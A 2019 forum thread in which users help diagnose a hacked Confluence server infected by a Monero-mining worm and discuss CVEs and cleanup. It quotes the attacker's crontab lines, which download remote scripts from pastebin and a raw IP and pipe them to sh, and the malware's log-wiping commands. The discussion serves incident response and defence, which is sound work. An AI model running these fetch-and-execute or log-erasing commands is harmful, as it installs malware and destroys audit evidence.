Server Hacked - Help Me Find the Cause

imok · April 16, 2019, 8:20pm

I think my confluence server has been hacked.

Any ideas what to do?

EDIT: found.

# crontab -u confluence -l
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh

WSS · April 16, 2019, 8:33pm

Remove ‘sh’ links. Shit will break, but nothing important. Most system things are designed to use ash/dash.

imok · April 16, 2019, 10:27pm

Found this scripts

https://pastebin.com/6ptLSGAu

I still don’t know completely what they are doing. I removed the cron job made by the attacker, removed the strange files in /tmp, changed user password and killed processes but they are still relaunching after seconds.

WSS · April 16, 2019, 10:31pm

Oddly, they seem to be removing other malware - not that I’ve checked everything - but nearly at a NORTON level of CPU abuse to do so.

Then, you know, their own is awesomesauce.

root · April 16, 2019, 11:18pm

Your “root” user was compromised. Anything can be happening there. It’s better to simply reinstall the whole thing from scratch and use the backups. Use a strong root password next time, change SSH port (or use Port Knocking), and update the kernel often because hackers love exploits.

Instead of wasting time trying to figure out what they did (from crontab to systemd, from rc.local to init.d, from loop processes with open ports and backdoors to IRC terminals in perl), it’s better to simply reinstall it again. They have root access like you do, while you read these lines. Grab your backups, and reinstall it.

EDIT:
Because you wish to find the “root” cause, there are only a few ways, as they seem to have root privileges already, so: either you had a weak root password; either they hacked a service you were already running as root; or they hacked a service that you were running as limited user, but they obtained root because you used an old kernel with a vulnerability which they exploited.

Jarland · April 17, 2019, 12:17am

When the fight to be the #1 botnet reaches critical mass…

blurry · April 17, 2019, 12:43am

isn’t server management 101. ssh key login? how were they able to get root in that situation?
is it ok to admit I don’t know some of my server password but I guard my key like nothing else.

imok · April 17, 2019, 12:56am

I don’t think root has been compromised. Only confluence user looks like affected.

Always.

Yeah I’m better reinstalling everything with a new version of Confluence

blurry · April 17, 2019, 1:03am

with or without swap?

imok · April 17, 2019, 1:03am

What?

Yes · April 17, 2019, 2:24am

https://nvd.nist.gov/vuln/detail/CVE-2019-3396
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Daniel · April 17, 2019, 2:41am

Would highly recommend getting a snapshot of the server (if it’s a VM that allows that) and pulling it offline while you investigate. It’s likely an attacker will delete all the logs and/or use it for nefarious things like sending spam and port scanning, which can get you nullrouted.

One approach I’d take would be to compare old backups and see exactly what’s been modified. If you use Borgbackup, it has a borg diff command that’d be useful.

doghouch · April 17, 2019, 4:21am

@imok Could it be a XMR/Monero miner?

imok · April 17, 2019, 5:03am

Most probably because CPU goes to 100% when those process are running.

I powered off the server until I can take action. Luckily this is a VM on a dedi.

It will be hilarious if CC blocks me for sending spam

Daniel · April 17, 2019, 5:27pm

Atlassian just sent this via email, which is probably it. It’s a different vunlerability (CVE-2019-3398) to the one @Yes linked to:

Security advisory for Confluence Server and Confluence Data Center
Hello,
We are writing to inform you of a critical security vulnerability that exists in Confluence Server and Confluence Data Center in these versions:
• From version 2.0.0 before 6.6.13 (the fixed version for 6.6.x)

• From version 6.7.0 before 6.12.4 (the fixed version for 6.12.x)

• From version 6.13.0 before 6.13.4 (the fixed version for 6.13.x)

• From version 6.14.0 before 6.14.3 (the fixed version for 6.14.x)

• From version 6.15.0 before 6.15.2 (the fixed version for 6.15.x)
Customers who have upgraded Confluence to version 6.6.13, 6.12.4, 6.13.4, 6.14.3, 6.15.2 or higher are not affected.
How do you fix it?
Customers who have downloaded and installed Confluence Server and or Confluence Data Center , follow the instructions provided in the detailed security advisory:
• Confluence Server and Data Center Security Advisory
If you have questions or concerns, please raise a support request. One of our support engineers will be happy to help you.
Kind regards,
Atlassian

imok · April 17, 2019, 6:13pm

Received too, but it does not look related to me. I will make a new shiny installation next week.

FHR · April 17, 2019, 6:36pm

Not sure how you concluded this, nothing so far points to this being true.

Please don’t.

This is a terrible advice. @imok will reinstall the server and attackers can get right back in.

Judging by the “confluence” user owning files and having stuff in their crontab, attackers definitely got in via that. Was SSH login possible through that user? If so and the user had a weak password… well here you go.

If not, the attacker came through the application itself, which means they did exploit some vulnerability in Confluence.

Here’s a virustotal of the malware itself, it seems to be a coin miner:

This is heavily supported by the fact that in the scripts you found on your server, it tries to kill and delete all other known coin miners first (so all CPU power is available to it).

CAREFUL, it seems the script also looks at your known_hosts file and tries to log in to all servers there with your ssh key and install itself. Triple check that the server’s private key wasn’t used to log in to anything. With that said, this should only work if the script was executed as the root user (which doesn’t seem to be the case) - but it never hurts to check.

Don’t even bother inspecting system logs:

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron

What you should look at is Confluence + webserver logs, they should show how the attacker got in. You might see something like a suspicious POST request from an unknown IP, or a GET request with some garbage in parameters. This should reveal how the attacker got in in the first place.

What you ultimately need to do is to nuke the server, carefully transplant the database from your backups and install a brand new version of Confluence.

Yes · April 17, 2019, 7:14pm

It’s just a weak worm (spreading only via known hosts) that spawns a Monero miner (khugepageds). It’s really well documented and there’s nothing special about it (you aren’t joining some botnet that is going to be interacted with by an actual criminal). You can do a full uninstall with the system offline or in rescue mode without worrying about any leftovers, but I understand you wouldn’t want to do that in production. The cause is almost certainly the CVE I linked (the other Atlassian ones recently are just path traversal) but if not, then it’s probably just an insecure SSH configuration…

If possible that sort of software should not be public facing anyway, although I understand why it can be a requirement. Thankfully you had it configured properly under its own user.

Just make sure you get a patched version of Atlassian’s S/W when you do the fresh install. Also WTF is going on with their versioning, no wonder so many people had problems with this despite their security announcements.

Shu · April 17, 2019, 7:52pm

same thing happened to me today

and I found this in my crontab

*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh

I have whmcs and plesk installed on this vps

FHR · April 17, 2019, 8:27pm

This is different. You’re infected by a very different malware. Must be a new thing (or obfuscated on the go), virustotal doesn’t report anything useful.